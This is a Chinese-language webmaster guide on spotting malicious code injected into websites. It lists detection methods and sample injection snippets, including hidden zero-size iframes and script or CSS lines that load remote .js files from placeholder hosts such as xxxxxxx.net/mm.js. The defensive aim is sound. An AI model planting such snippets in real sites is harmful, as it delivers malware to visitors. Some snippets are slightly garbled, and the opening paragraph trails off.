网页挂码有三种方式，具体怎么挂的，我就不多说了，网页被挂码的时候，HTML会混乱，造成前台首页参差不齐，你进你的网页后,注意壮态栏,会有莫名的网址出现,一闪而过,完全打开后,会出现”此站代码被加密”,也有可能是英文”the site is..”是什么来的忘记了…恶意的会弹出乱七八糟的其它网站窗口……GX,,,,,,,,你的网站中网马了…..查看原代码时头或尾会出现”<ifrmar>的代码,,,,,,,”那么有没有什么办法。在网站被挂马的第一时间，及时得到通知。这样网站的管理者就能以最快的速度进行处理。把不良影响减少到最低呢？以下就有一个简单的办法，而且免费。目前流行的网站被黑，是在相应的asp,htm,js等文件中，插入以js调用方式的

一：如何才能发现网站被挂马?
1、杀毒软件检测，常用的杀毒软件也可以检测出来。
2、人工检测，打开你的网站、博客，点击右键查看源文件，根据网页挂马的种类也可以查看是否中了木马。
3、专业检测工具 如木马清道夫

二：挂马种类：

1、框架挂马：<iframe src=地址 width=0 height=0></iframe>

2、js文件挂马：<script language=”javascript” src=”</script’>http://xxxxxxx.net/mm.js”></script>

3、css中挂马：　　body {

background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}

4、图片伪装：　　<html>

<iframe src=”网马地址” height=0 width=0></iframe>

<img src=”图片地址”></center>

</html>

5、再一种代码就是调用其他网页的页面文件,可以将下面的代码复制，保存为HTM文件，代码如下：
<frameset rows=”444,0″ cols=”*”>
<frame src=”/index.htm” framborder=”no” scrolling=”auto” noresize marginwidth=”0″ margingheight=”0″>
<frame src=”help.htm” frameborder=”no” scrolling=”no” noresize marginwidth=”0″ margingheight=”0″>
</frameset>

上面这些特征的代码，假如里面包含的网址不是自己网站的，那基本上就是中了木马了。我们比较常见的木马是<iframe,对网站首页以及其它主要页面的源代码进行检查，用记事本打开这些页面后，以“<iframe”为枢纽字进行搜索，找到后可以查看是否是挂马代码。不外碰上有经验的黑客，会编写一段代码将整句挂马代码进行加密，这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序，假如有个别网页被修改，我们可以很快地发现。